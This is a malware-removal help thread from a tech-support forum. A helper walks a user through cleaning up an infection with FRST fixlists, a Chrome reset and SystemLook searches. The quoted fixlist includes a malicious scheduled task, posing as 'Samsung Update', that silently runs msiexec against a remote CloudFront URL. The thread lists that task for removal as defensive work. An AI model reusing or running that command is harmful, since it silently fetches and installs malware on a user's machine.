Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Folders/files containing winsap.dll and snare.msi return after disinfection


  • This topic is locked This topic is locked
18 replies to this topic

#1 1dj

1dj

  • Members
  • 9 posts
  • OFFLINE
  •  

Posted 28 April 2017 - 09:13 PM

So I was an idiot last week and ran this setup.exe program from Mediafire. It seems this program had been bundled with all this malware/viruses. Now I've used a few antivirus' like Zam, CCleaner, Malware Bytes, Kaspersky who all removed most of the adware/PUP. 
 
However Im up to the point now where it seems there is still something left on my computer, Kaspersky is continually deleting some files which appear on C:/<folder> and C:/Program Files/<folder> as can be seen here http://i.imgur.com/Pf01Q2H.png (Kaspersky report) or here http://i.imgur.com/6kN01iQ.png (One of the folders which keep coming back when I restart windows)
 
These files keep on coming back when I restart windows to "disinfect my computer" Ive completed rootkit scans and full scans from Kaspersky and they are not detecting anything.
 
 

Attached Files



BC AdBot (Login to Remove)

 


#2 1dj

1dj
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  

Posted 28 April 2017 - 10:33 PM

After running some programs before here are the logs from them. I will also note that it seems that when I click my Chrome shortcut in the taskbar, it opens up a new instance of chrome which is not pinned on the taskbar. Reinstaling chrome will fix this unitl a restart where it will do this again.

Attached Files


Edited by 1dj, 28 April 2017 - 10:38 PM.


#3 nasdaq

nasdaq

  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:46 AM

Posted 29 April 2017 - 08:33 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2833979337-2780947661-2915321693-1001\...\Run: [Windows Defender] => -
ShellExecuteHooks: No Name - {A950E7F8-2366-11E7-B493-64006A5CFC23} - C:\Users\danie\AppData\Roaming\Anerliphgricied\Pherrasy.dll -> No File
CHR Profile: C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-04-29] <==== ATTENTION
CHR Extension: (EditThisCookie) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2016-12-08]
CHR Extension: (Popup Blocker Pro) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kiodaajmphnkcajieajajinghpejdjai [2017-01-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-12]
CHR Extension: (Chrome Media Router) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-26]
S2 AdBlockerService; C:\Program Files (x86)\AdBlocker\AdBlockerService.exe [X]
S2 HKClipSvc; C:\Program Files (x86)\Hotkey\Driver\x64\HKClipSvc.exe [X]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S2 PowerBiosServer; "C:\Program Files (x86)\Hotkey\HotkeyService.exe" [X]
Task: {03244A71-F0F7-4EEE-9B53-74CF550632A6} - \Microsoft\Windows\Media Center\RegisterObject -> No File <==== ATTENTION
Task: {5BBC0DE0-3D6D-43D4-A9E3-24D9E7761BF2} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=SanDiskXSD8SN8U512G1122_162304427574&amp;d=20170426 /q <==== ATTENTION
Task: {6F2AC8EF-04FB-415C-A9A5-C6252B20BA83} - \QMC Reader for VAB -> No File <==== ATTENTION
Task: {701B2478-32EB-4392-A59B-E66E1FA91CC9} - \Prezoph -> No File <==== ATTENTION

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Reset Chrome...
Open Google Chrome, click on menu icon google-chrome-setting-icon.png which is located right side top of the google chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after the update you can remove the old versions of Java via the Control Panel > Programs > Programs and Features.
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
===

Please let me know what problem persists with this computer.


p.s.

Reinstaling chrome will fix this until a restart where it will do this again.


Are you Syncing your Chrome account?
That may be the reason that the problem returned.

#4 1dj

1dj
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  

Posted 29 April 2017 - 09:25 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 

Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2833979337-2780947661-2915321693-1001\...\Run: [Windows Defender] => -
ShellExecuteHooks: No Name - {A950E7F8-2366-11E7-B493-64006A5CFC23} - C:\Users\danie\AppData\Roaming\Anerliphgricied\Pherrasy.dll -> No File
CHR Profile: C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-04-29] <==== ATTENTION
CHR Extension: (EditThisCookie) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2016-12-08]
CHR Extension: (Popup Blocker Pro) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kiodaajmphnkcajieajajinghpejdjai [2017-01-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-12]
CHR Extension: (Chrome Media Router) - C:\Users\danie\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-26]
S2 AdBlockerService; C:\Program Files (x86)\AdBlocker\AdBlockerService.exe [X]
S2 HKClipSvc; C:\Program Files (x86)\Hotkey\Driver\x64\HKClipSvc.exe [X]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S2 PowerBiosServer; "C:\Program Files (x86)\Hotkey\HotkeyService.exe" [X]
Task: {03244A71-F0F7-4EEE-9B53-74CF550632A6} - \Microsoft\Windows\Media Center\RegisterObject -> No File <==== ATTENTION
Task: {5BBC0DE0-3D6D-43D4-A9E3-24D9E7761BF2} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=SanDiskXSD8SN8U512G1122_162304427574&amp;d=20170426 /q <==== ATTENTION
Task: {6F2AC8EF-04FB-415C-A9A5-C6252B20BA83} - \QMC Reader for VAB -> No File <==== ATTENTION
Task: {701B2478-32EB-4392-A59B-E66E1FA91CC9} - \Prezoph -> No File <==== ATTENTION

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Reset Chrome...
Open Google Chrome, click on menu icon google-chrome-setting-icon.png which is located right side top of the google chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after the update you can remove the old versions of Java via the Control Panel > Programs > Programs and Features.
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
===

Please let me know what problem persists with this computer.


p.s.

Reinstaling chrome will fix this until a restart where it will do this again.


Are you Syncing your Chrome account?
That may be the reason that the problem returned.

 

 

Hello, thanks a lot for that.

 

It seems so far good!

Ill let you know how I go and if I still see any issues.

 

EDIT: Im seeing in my task manager this program called Windows® update with a random process name, is this concerning?

http://i.imgur.com/8DWDDgY.png (This screenshot has a different process name to the random one I saw before)

Attached Files


Edited by 1dj, 29 April 2017 - 09:31 AM.


#5 nasdaq

nasdaq

  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:46 AM

Posted 30 April 2017 - 08:07 AM


Msiexec is an important programs from Microsoflt nothing to worry about.

https://technet.microsoft.com/en-us/library/bb490936.aspx
===

==================== Restore Points =========================

The windows update files are assigned by Microsoft nothing to worry about.
If you look at your Restore points in the Addition.txt file you will see when they are installed.

15-04-2017 00:24:54 Windows Update
19-04-2017 00:02:11 Windows Update
22-04-2017 22:52:11 Windows Update
25-04-2017 23:25:19 Windows Update
29-04-2017 00:34:33 Windows Update


===

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
===

#6 1dj

1dj
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  

Posted 30 April 2017 - 09:47 AM

Ive comepletely reset chrome and uninstalled and reinstalled it and it still is spawning processes which are not pinned to the taskbar about 30 minutes after using it. I havent synced with my accoount so I have no idea whats causing it.



#7 nasdaq

nasdaq

  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:46 AM

Posted 30 April 2017 - 12:44 PM




Download the Sustemlook appropriate for you system.

SystemLook.exe
SystemLook_x64.exe
  • Double-click SystemLook.exe/SystemLook_x64.exe
  • to run it.
  • Copy and paste the content of the following bold text into the main textfield:
  • :reg
    winsap.dll;snare.msi
    :file
    winsap.dll;snare.msi
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
  • Note: The log can also be found on your Desktop entitled SystemLook.txt.
  • ===




#8 1dj

1dj
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  

Posted 01 May 2017 - 05:44 AM

SystemLook 30.07.11 by jpshortstuff
Log created at 20:44 on 01/05/2017 by danie
Administrator - Elevation successful
 
========== reg ==========
 
[winsap.dll;snare.msi]
Hive unrecognized.
 
========== file ==========
 
winsap.dll;snare.msi - Unable to find/read file.
 
-= EOF =-


#9 nasdaq

nasdaq

  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:46 AM

Posted 01 May 2017 - 07:05 AM


Lets try two searches, one for the Registry and the other the the files.

For the registry search hit the Registry Search button with

:reg
winsap.dll;snare.msi[/b[

Then for the files hit the File Search button with

[b]:file
winsap.dll;snare.msi


#10 1dj

1dj
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  

Posted 01 May 2017 - 08:31 AM

Lets try two searches, one for the Registry and the other the the files.

For the registry search hit the Registry Search button with

:reg
winsap.dll;snare.msi

Then for the files hit the File Search button with

:file
winsap.dll;snare.msi

Where do I put this? Also [b] ?

Edited by nasdaq, 01 May 2017 - 12:01 PM.


#11 nasdaq

nasdaq

  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:46 AM

Posted 01 May 2017 - 12:09 PM

sorry the b in the bracket was a format error. I corrected it.


Copy this command in the Text field of the SyistemLook box and click the Registry button.
:reg
winsap.dll;snare.msi


Save the results.

Do an other search.

Copy this command in the Text field and click the File Search button.
:file
winsap.dll;snare.msi


Save the results also.


Post both of the results.

Edited by nasdaq, 10 May 2017 - 07:40 AM.


#12 1dj

1dj
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  

Posted 01 May 2017 - 08:25 PM

There is only the buttons "Look" and "Exit"

Though after putting in the text field here are the results

 
SystemLook 30.07.11 by jpshortstuff
Log created at 11:24 on 02/05/2017 by danie
Administrator - Elevation successful
 
 
========== file ==========
 
winsap.dll;snare.msi - Unable to find/read file.
 
-= EOF =-
SystemLook 30.07.11 by jpshortstuff
Log created at 11:25 on 02/05/2017 by danie
Administrator - Elevation successful
 
========== reg ==========
 
[winsap.dll;snare.msi]
Hive unrecognized.
 
-= EOF =-


#13 nasdaq

nasdaq

  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:46 AM

Posted 02 May 2017 - 07:46 AM

Do you still have problems with the files I was looking for?

 

What are the remaining issues?



#14 nasdaq

nasdaq

  • Malware Response Team
  • 39,909 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:46 AM

Posted 08 May 2017 - 07:35 AM

Are you still with me?

#15 1dj

1dj
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  

Posted 10 May 2017 - 06:50 AM

Are you still with me?

Yes I am Sorry.

 

It seems that every 3 days or so Chrome unattaches itself to the pinned process and creates a new process to which I have to repin.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users